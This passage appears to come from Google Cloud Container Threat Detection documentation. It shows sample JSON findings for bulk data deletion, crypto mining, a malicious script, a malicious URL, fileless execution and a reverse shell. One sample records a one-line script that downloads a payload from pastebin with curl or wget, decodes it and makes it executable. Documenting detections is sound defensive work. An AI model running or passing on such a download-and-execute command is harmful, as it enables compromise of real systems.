"\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "CRITICAL", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_detect_malicious_cmdlines" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1485/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection" } ], "relatedFindingUri": {} } }, }
Impact : supprimer des données du disque de manière groupée
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Impact: Remove Bulk Data From Disk", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-remove-bulk-data-from-disk-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_remove_bulk_data_from_disk" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1485/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection" } ], "relatedFindingUri": {} } }, }
Impact : activité de minage de cryptomonnaie suspecte utilisant le protocole Stratum
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Impact: Suspicious crypto mining activity using the Stratum Protocol", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "ESCAPE_TO_HOST" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "INTERPRETER", "size": "147176", "sha256": "INTERPRETER_SHA_256", "hashedSize": "147176", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "INTERPRETER", "ARG" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"HOSTNAME\"", "val": "\"ktd-test-detect-crypto-miners-ba379a7c2168db11\"" }, { "name": "\"HOME\"", "val": "\"/root\"" }, { "name": "\"GPG_KEY\"", "val": "\"7169605F62C751356D054A26A821E680E5FA6305\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"34.118.224.1\"" }, { "name": "\"PATH\"", "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHON_VERSION\"", "val": "\"3.12.6\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://34.118.224.1:443\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"34.118.224.1\"" }, { "name": "\"PWD\"", "val": "\"/\"" } ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_detect_crypto_miners_using_stratum_protocol" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1496/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/f3bf59164816762430e8cdf5a5d64b4284a86af86245a52067c533c8cd98f215/detection" } ], "relatedFindingUri": {} } }, }
Script malveillant exécuté
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "state": "ACTIVE", "category": "Malicious Script Executed", "sourceProperties": { "VM_Instance_Name": "INSTANCE_ID", "Script_Filename": "FILENAME", "Script_SHA256": "SHA_256", "Container_Image_Id": "CONTAINER_IMAGE_ID", "Container_Name": "CONTAINER_NAME", "Parent_Pid": 1.0, "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Process_Creation_Timestamp": { "seconds": 1.617989997E9, "nanos": 1.17396995E8 }, "Pid": 53.0, "Pod_Namespace": "default", "Process_Binary_Fullpath": "INTERPRETER", "Process_Arguments": ["INTERPRETER", "FILENAME"], "Pod_Name": "POD_NAME", "description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.", "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;", "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect- test-4af235e12be6f9d9", "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS", "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "KUBERNETES_PORT_443_TCP_PORT\u003d443", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "DEBIAN_FRONTEND\u003dnoninteractive", "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "KUBERNETES_SERVICE_PORT_HTTPS\u003d443", "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"], "Container_Creation_Timestamp": { "seconds": 1.617989918E9, "nanos": 0.0 } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-09T17:39:57.527Z", "createTime": "2021-04-09T17:39:57.625Z", "propertyDataTypes": { "Container_Image_Id": { "primitiveDataType": "STRING" }, "Pod_Namespace": { "primitiveDataType": "STRING" }, "Container_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Environment_Variables": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "description": { "primitiveDataType": "STRING" }, "Pid": { "primitiveDataType": "NUMBER" }, "Process_Arguments": { "listValues": { "propertyDataTypes": [{ "primitiveDataType": "STRING" }] } }, "Container_Image_Uri": { "primitiveDataType": "STRING" }, "Pod_Name": { "primitiveDataType": "STRING" }, "Process_Creation_Timestamp": { "dataType": "TIMESTAMP", "structValue": { "fields": { "seconds": { "primitiveDataType": "NUMBER" }, "nanos": { "primitiveDataType": "NUMBER" } } } }, "Parent_Pid": { "primitiveDataType": "NUMBER" }, "VM_Instance_Name": { "primitiveDataType": "STRING" }, "Script_Content": { "primitiveDataType": "STRING" }, "Script_Filename": { "primitiveDataType": "STRING" }, "Container_Name": { "primitiveDataType": "STRING" }, "Script_SHA256": { "primitiveDataType": "STRING" }, "Process_Binary_Fullpath": { "primitiveDataType": "STRING" } }, "severity": "CRITICAL", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "type": "google.container.Cluster" } }
URL malveillante observée
{ "findings": { "access": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Malicious URL Observed", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": "CONTAINER_IMAGE_ID" } ], "createTime": "2022-09-14T21:35:46.209Z", "database": {}, "description": "A malicious URL is observed in the container workload.", "eventTime": "2022-09-14T21:35:45.992Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": { "uris": [ "testsafebrowsing.appspot.com/s/malware.html" ] }, "kubernetes": { "pods": [ { "ns": "default", "name": "CONTAINER_NAME", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_URI", "imageId": CONTAINER_IMAGE_ID" } ] } ] }, "mitreAttack": { "primaryTactic": "COMMAND_AND_CONTROL", "primaryTechniques": [ "INGRESS_TOOL_TRANSFER" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/bin/echo\"" }, "script": {}, "args": [ "\"/bin/echo\"", "\"https://testsafebrowsing.appspot.com/s/malware.html\"" ], "envVariables": [ { "name": "\"PATH\"", "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"" }, { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, { "name": "\"DEBIAN_FRONTEND\"", "val": "\"noninteractive\"" }, { "name": "\"LANG\"", "val": "\"C.UTF-8\"" }, { "name": "\"PYTHONUNBUFFERED\"", "val": "\"1\"" }, { "name": "\"PORT\"", "val": "\"8080\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"", "val": "\"IP_ADDRESS\"" }, { "name": "\"KUBERNETES_SERVICE_HOST\"", "val": "\"IP_ADDRESS\"" }, { "name": "\"KUBERNETES_SERVICE_PORT\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"", "val": "\"443\"" }, { "name": "\"KUBERNETES_PORT\"", "val": "\"tcp://IP_ADDRESS:443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP\"", "val": "\"tcp://IP_ADDRESS:443\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"", "val": "\"tcp\"" }, { "name": "\"KUBERNETES_PORT_443_TCP_PORT\"", "val": "\"443\"" }, { "name": "\"HOME\"", "val": "\"/root\"" } ], "pid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "severity": "MEDIUM", "sourceDisplayName": "Container Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID", "display_name": "CLUSTER_ID", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parent_display_name": "PROJECT_ID", "type": "google.container.Cluster", "folders": [] }, "sourceProperties": { "Container_Image_Id": "CONTAINER_IMAGE_ID", "Pod_Namespace": "default", "Container_Name": "CONTAINER_NAME", "Process_Binary_Fullpath": "/bin/echo", "description": "A malicious URL is observed in the container workload.", "VM_Instance_Name": "VM_INSTANCE_NAME", "Pid": 1, "Process_Arguments": [ "/bin/echo", "https://testsafebrowsing.appspot.com/s/malware.html" ], "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Parent_Pid": 0, "Process_Creation_Timestamp": { "seconds": 1663191345, "nanos": 7717272 }, "Environment_Variables": [ "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=CONTAINER_NAME", "DEBIAN_FRONTEND=noninteractive", "LANG=C.UTF-8", "PYTHONUNBUFFERED=1", "PORT=8080", "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS", "KUBERNETES_SERVICE_HOST=IP_ADDRESS", "KUBERNETES_SERVICE_PORT=443", "KUBERNETES_SERVICE_PORT_HTTPS=443", "KUBERNETES_PORT=tcp://IP_ADDRESS:443", "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443", "KUBERNETES_PORT_443_TCP_PROTO=tcp", "KUBERNETES_PORT_443_TCP_PORT=443", "HOME=/root" ], "Container_Creation_Timestamp": { "seconds": 1663191345, "nanos": 0 }, "Pod_Name": "CONTAINER_NAME" } }
Élévation des privilèges : exécution sans fichier dans /dev/shm
{ "finding": { "access": {}, "application": {}, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Privilege Escalation: Fileless Execution in /dev/shm", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2024-06-17T18:50:13Z" } ], "createTime": "2025-01-21T19:55:22.017Z", "database": {}, "eventTime": "2025-01-21T19:55:21.762Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd", "indicator": {}, "kernelRootkit": {}, "kubernetes": { "pods": [ { "name": "CONTAINER_NAME", "ns": "NAMESPACE", "containers": [ { "name": "CONTAINER_NAME", "uri": "CONTAINER_IMAGE_URI", "imageId": "CONTAINER_IMAGE_ID", "createTime": "2025-01-21T19:55:19Z" } ] } ], "nodes": [ { "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID" } ] }, "logEntries": [ { "cloudLoggingEntry": { "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": "2025-01-21T19:55:19.654640277Z" } } ], "mitreAttack": {}, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "PROCESS_INJECTION" ] "additionalTactics": [ "DEFENSE_EVASION" ], "additionalTechniques": [ "COMMAND_AND_SCRIPTING_INTERPRETER", "UNIX_SHELL", "HIDE_ARTIFACTS" ] }, "mute": "UNDEFINED", "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "muteUpdateTime": "1970-01-01T00:00:00Z", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global", "parentDisplayName": "Container Threat Detection", "processes": [ { "binary": { "path": "\"/dev/shm/echo\"", "size": "39096", "sha256": "a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84", "hashedSize": "39096", "partiallyHashed": false, "diskPath": {} }, "script": { "size": "0", "hashedSize": "0", "partiallyHashed": false, "diskPath": {} }, "args": [ "\"eho\"", "\"Hello World\"" ], "argumentsTruncated": false, "envVariables": [ { "name": "\"HOSTNAME\"", "val": "\"CONTAINER_NAME\"" }, ], "pid": "9", "parentPid": "1" } ], "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "securityPosture": {}, "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "displayName": "CLUSTER_ID", "type": "google.container.Cluster", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "container.googleapis.com", "location": "ZONE", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": "FOLDER_ID" } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_ID", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_ID" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID" }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ktd_fileless_execution_detection" }, "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_NUMBER", "timestamp": { "seconds": "1729291973", "nanos": 687426149 } } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0004/" }, "virustotalIndicatorQueryUri": [ { "displayName": "VirusTotal File Link", "url": "https://www.virustotal.com/gui/file/a51595201def5bde3c47d68c8e8dda31f4e424293f2a5eefb00e47f2db0c2d84/detection" } ], "relatedFindingUri": {} } }, }
Interface système inversée
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID", "state": "ACTIVE", "category": "Reverse Shell", "sourceProperties": { "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS", "Environment_Variables": ["HOSTNAME\u003dreverse-shell", "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1", "KUBERNETES_SERVICE_PORT\u003d443", "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1", "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "KUBERNETES_SERVICE_PORT_HTTPS\u003d443", "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080", "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS", "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"], "Container_Image_Uri": "CONTAINER_IMAGE_URI", "Process_Binary_Fullpath": "BINARY_PATH", "Container_Creation_Timestamp": { "seconds": 1.617989861E9, "nanos": 0.0 }, "Pod_Name": "POD_NAME", "Container_Name": "CONTAINER_NAME", "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"], "Pid": 15.0, "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT, "Container_Image_Id": "CONTAINER_IMAGE_ID", "Reverse_Shell_Stdin_Redirection_Dst_Ip": 